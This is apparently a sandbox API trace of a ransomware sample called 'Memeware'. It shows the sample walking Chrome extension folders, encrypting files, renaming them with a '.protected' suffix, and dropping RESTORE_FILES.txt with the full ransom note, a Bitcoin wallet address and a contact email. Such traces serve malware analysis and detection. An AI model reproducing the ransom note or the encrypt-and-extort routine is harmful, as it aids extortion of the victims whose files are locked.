[0080.929] lstrlenA (lpString="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") returned 684 [0080.929] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.929] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.929] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.929] CloseHandle (hObject=0x164) returned 1 [0080.929] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.929] lstrcmpiW (lpString1="ca", lpString2="Windows") returned -1 [0080.929] lstrcmpiW (lpString1="ca", lpString2="Program Files") returned -1 [0080.929] lstrcmpiW (lpString1="ca", lpString2="Program Files (x86)") returned -1 [0080.929] lstrcmpiW (lpString1="ca", lpString2="$Recycle.bin") returned 1 [0080.929] lstrcmpiW (lpString1="ca", lpString2="System Volume Information") returned -1 [0080.929] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ca") returned 145 [0080.929] lstrcmpW (lpString1="ca", lpString2=".") returned 1 [0080.929] lstrcmpW (lpString1="ca", lpString2="..") returned 1 [0080.929] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ca\\*") returned 147 [0080.929] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ca\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.930] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.930] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.930] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.930] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.930] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.930] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ca\\.") returned 147 [0080.930] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.930] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.930] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.930] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.930] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.930] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.930] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.930] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ca\\..") returned 148 [0080.930] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.930] lstrcmpW (lpString1="..", 
lpString2="..") returned 0 [0080.930] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.930] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.930] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.930] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.930] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.930] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.930] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ca\\messages.json") returned 159 [0080.930] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.930] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.930] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.930] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.931] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ca\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ca\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.931] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ca\\messages.json") returned 159 [0080.931] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.931] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ca\\messages.json") returned 159 [0080.931] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.931] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ca\\messages.json") returned 159 [0080.931] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.931] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x2c1, lpOverlapped=0x0) returned 1 [0080.938] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffd3f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.938] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x2c1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x2c1, lpOverlapped=0x0) returned 1 [0080.938] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.939] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.939] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: 
lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.939] CloseHandle (hObject=0x168) returned 1 [0080.939] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ca\\messages.json.protected") returned 169 [0080.939] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ca\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ca\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ca\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ca\\messages.json.protected")) returned 1 [0080.940] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.940] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.940] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ca\\RESTORE_FILES.txt") returned 163 [0080.940] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ca\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js 
halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ca\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.940] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.940] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 
[0080.941] lstrlenA (lpString="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") returned 684 [0080.941] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.941] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.941] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.941] CloseHandle (hObject=0x164) returned 1 [0080.942] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.942] lstrcmpiW (lpString1="cs", lpString2="Windows") returned -1 [0080.942] lstrcmpiW (lpString1="cs", lpString2="Program Files") returned -1 [0080.942] lstrcmpiW (lpString1="cs", lpString2="Program Files (x86)") returned -1 [0080.942] lstrcmpiW (lpString1="cs", lpString2="$Recycle.bin") returned 1 [0080.942] lstrcmpiW (lpString1="cs", lpString2="System Volume Information") returned -1 [0080.942] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\cs") returned 145 [0080.942] lstrcmpW (lpString1="cs", lpString2=".") returned 1 [0080.942] lstrcmpW (lpString1="cs", lpString2="..") returned 1 [0080.942] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\cs\\*") returned 147 [0080.942] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\cs\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.942] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.942] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.942] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.942] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.942] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.942] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\cs\\.") returned 147 [0080.942] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.942] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.942] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.942] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.942] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.942] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.942] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.942] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\cs\\..") returned 148 [0080.943] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.943] lstrcmpW (lpString1="..", 
lpString2="..") returned 0 [0080.943] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.943] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.943] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.943] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.943] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.943] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.943] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\cs\\messages.json") returned 159 [0080.943] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.943] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.943] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.943] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.943] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\cs\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\cs\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.944] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\cs\\messages.json") returned 159 [0080.944] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.944] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\cs\\messages.json") returned 159 [0080.944] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.944] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\cs\\messages.json") returned 159 [0080.944] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.944] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x297, lpOverlapped=0x0) returned 1 [0080.949] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffd69, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.950] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x297, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x297, lpOverlapped=0x0) returned 1 [0080.950] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.950] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.950] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: 
lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.950] CloseHandle (hObject=0x168) returned 1 [0080.950] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\cs\\messages.json.protected") returned 169 [0080.950] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\cs\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\cs\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\cs\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\cs\\messages.json.protected")) returned 1 [0080.951] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.951] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.951] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\cs\\RESTORE_FILES.txt") returned 163 [0080.951] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\cs\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js 
halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\cs\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.952] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.952] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 
[0080.952] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0080.953] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.953] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.953] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.953] CloseHandle (hObject=0x164) returned 1 [0080.953] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.953] lstrcmpiW (lpString1="da", lpString2="Windows") returned -1 [0080.953] lstrcmpiW (lpString1="da", lpString2="Program Files") returned -1 [0080.953] lstrcmpiW (lpString1="da", lpString2="Program Files (x86)") returned -1 [0080.953] lstrcmpiW (lpString1="da", lpString2="$Recycle.bin") returned 1 [0080.953] lstrcmpiW (lpString1="da", lpString2="System Volume Information") returned -1 
